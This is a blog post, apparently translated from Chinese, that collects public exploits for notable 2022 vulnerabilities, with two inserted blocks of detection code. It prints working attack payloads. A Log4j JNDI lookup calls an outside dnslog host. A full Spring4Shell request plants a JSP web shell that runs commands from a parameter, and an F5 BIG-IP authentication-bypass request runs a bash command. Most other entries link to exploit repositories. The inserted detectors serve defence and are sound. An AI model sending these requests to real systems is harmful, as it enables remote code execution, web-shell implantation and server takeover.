2022 Top 10 Vulnerabilities

Preface

I noticed that several entries in the Top 10 are ones I have never run into, so I had to write them down.

exp

CVE-2021-44228 Log4j remote code execution

Basic payload: ${jndi:ldap://ky28eo.dnslog.cn}
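As an added example (not part of the original post), here is a small scanner that flags the JNDI lookup shape above in web-server or application log lines. The log lines and host names it scans are constructed for the example, not captured traffic.

```python
import re

# Added example, not from the original post: flag Log4j JNDI lookup strings
# in log lines. A direct "${jndi:...}" is reported as 'jndi'; a "${" nested
# inside another "${...}" lookup is reported as 'nested', because ordinary
# log messages practically never contain one.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
NESTED_LOOKUP_RE = re.compile(r"\$\{[^}]*\$\{")


def classify_line(line: str) -> str:
    """Return 'jndi', 'nested' or 'clean' for one log line."""
    if JNDI_RE.search(line):
        return "jndi"
    if NESTED_LOOKUP_RE.search(line):
        return "nested"
    return "clean"


def scan(lines):
    """Return (line_number, verdict, line) for every line that is not clean."""
    hits = []
    for number, line in enumerate(lines, 1):
        verdict = classify_line(line)
        if verdict != "clean":
            hits.append((number, verdict, line.rstrip()))
    return hits


# Constructed sample log lines (placeholder addresses and hosts).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:00:02 +0000] "GET /?q=${JNDI:dns://example.invalid/b} HTTP/1.1" 200 12 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${x}:y}"',
    "INFO price is ${price} for order 42",
]

if __name__ == "__main__":
    for number, verdict, line in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}: {line}")
```

The User-Agent field is checked along with the request line because the basic payload is usually placed in whatever header the application logs; the `${price}` line shows that a plain template placeholder is not flagged.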

CVE-2022-30190

From the reproduction write-ups I read, this is an Office remote code execution vulnerability. PoC: https://github.com/JohnHammond/msdt-follina

CVE-2022-22965

A Spring vulnerability with quite a few preconditions. PoC as follows:

GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host:x.x.x.x
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1
CVE-2022-0609

A Chrome vulnerability with no public PoC; see the analysis article on 先知 (xz.aliyun.com) for reference.

F5 BIG-IP authentication bypass CVE-2022-1388

PoC

POST /mgmt/tm/util/bash HTTP/1.1
Host: 127.0.0.1
Authorization: Basic YWRtaW46
X-F5-Auth-Token: a
Connection: X-F5-Auth-Token
Content-type: application/json
Content-Length: 41

{"command":"run", "utilCmdArgs": "-c id"}
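Added example, not from the original post: a request-level check that covers both raw requests shown above, the Spring4Shell query-parameter path (CVE-2022-22965) and the F5 request that lists X-F5-Auth-Token in the Connection header (CVE-2022-1388). The sample requests are constructed for the example, with placeholder hosts and a placeholder body.

```python
from urllib.parse import urlsplit, parse_qsl

# Added example, not from the original post: detect the request shapes of the
# two PoCs above. Sample requests are constructed, not real traffic.
SPRING_PREFIX = "class.module.classloader."  # CVE-2022-22965 property path (lower-cased)
F5_BASH_PATH = "/mgmt/tm/util/bash"           # endpoint used by the CVE-2022-1388 PoC


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, query keys, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target = lines[0].split(" ")[:2]
    parts = urlsplit(target)
    query_keys = [k for k, _ in parse_qsl(parts.query, keep_blank_values=True)]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, parts.path, query_keys, headers, body


def detect(raw: str):
    """Return the CVE ids whose request signature matches `raw`."""
    method, path, query_keys, headers, body = parse_request(raw)
    hits = []

    # CVE-2022-22965: any parameter name that reaches into the class loader
    # via class.module.classLoader.*, in the query string or a form body.
    body_keys = []
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        body_keys = [k for k, _ in parse_qsl(body, keep_blank_values=True)]
    if any(k.lower().startswith(SPRING_PREFIX) for k in query_keys + body_keys):
        hits.append("CVE-2022-22965")

    # CVE-2022-1388: the PoC's distinguishing features are a request to the
    # bash utility endpoint with X-F5-Auth-Token named as a Connection header
    # token; no legitimate client sends that combination.
    conn_tokens = {t.strip().lower() for t in headers.get("connection", "").split(",")}
    if path == F5_BASH_PATH and "x-f5-auth-token" in conn_tokens:
        hits.append("CVE-2022-1388")

    return hits


# Constructed sample requests (placeholder hosts and bodies).
SAMPLES = {
    "spring": (
        "GET /?class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp HTTP/1.1\r\n"
        "Host: app.example\r\n\r\n"
    ),
    "f5": (
        "POST /mgmt/tm/util/bash HTTP/1.1\r\n"
        "Host: bigip.example\r\n"
        "X-F5-Auth-Token: a\r\n"
        "Connection: X-F5-Auth-Token\r\n"
        "Content-Type: application/json\r\n\r\n"
        '{"command": "run", "utilCmdArgs": "<placeholder>"}'
    ),
    "benign": (
        "GET /index.html?class=foo HTTP/1.1\r\n"
        "Host: app.example\r\n"
        "Connection: close\r\n\r\n"
    ),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name}: {detect(raw) or 'no match'}")
```

Both rules match on parameter and header names rather than on the payload text, so URL-encoding or changing the JSP content in the Spring request, or the command in the F5 body, does not hide the request from them.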

CVE-2017-11882

This Office RCE vulnerability is a true classic; at the time it worked against every Office version. PoC: https://github.com/Ridter/CVE-2017-11882

CVE-2022-41040 && CVE-2022-41082

CVE-2022-41040 Microsoft Exchange Server elevation of privilege vulnerability
CVE-2022-41082 Microsoft Exchange Server remote code execution vulnerability

PoC: https://github.com/CronUp/Vulnerabilidades

CVE-2022-27925 && CVE-2022-41352

  1. https://github.com/vnhacker1337/CVE-2022-27925-PoC

  2. https://github.com/Cr4ckC4t/cve-2022-41352-zimbra-rce

CVE-2022-26134

https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL

CVE-2022-30525

https://github.com/Henry4E36/CVE-2022-30525

References

  • https://www.cnblogs.com/loongten/p/15822195.html
  • https://paper.seebug.org/1915/
  • https://blog.csdn.net/qq_45894840/article/details/125200463
  • https://www.cnblogs.com/cute-puli/p/16329332.html
  • https://xz.aliyun.com/t/11121
  • https://xz.aliyun.com/t/11418
  • https://www.sqlsec.com/2020/10/office.html
  • https://www.cnblogs.com/dnoir/p/microsoft-exchange-server-cve202241040--cve2022410.html
  • https://www.yang99.top/index.php/archives/82/
  • https://zgao.top/cve-2022-26134-confluence-ognl%E6%B3%A8%E5%85%A5%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/
  • https://zgao.top/cve-2022-30525-zyxel-firewalls-ztp-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/

Source: https://blog.njcit.me/2023/01/28/poc_exp/2022_top10/
Author: ccadmin
Published: January 28, 2023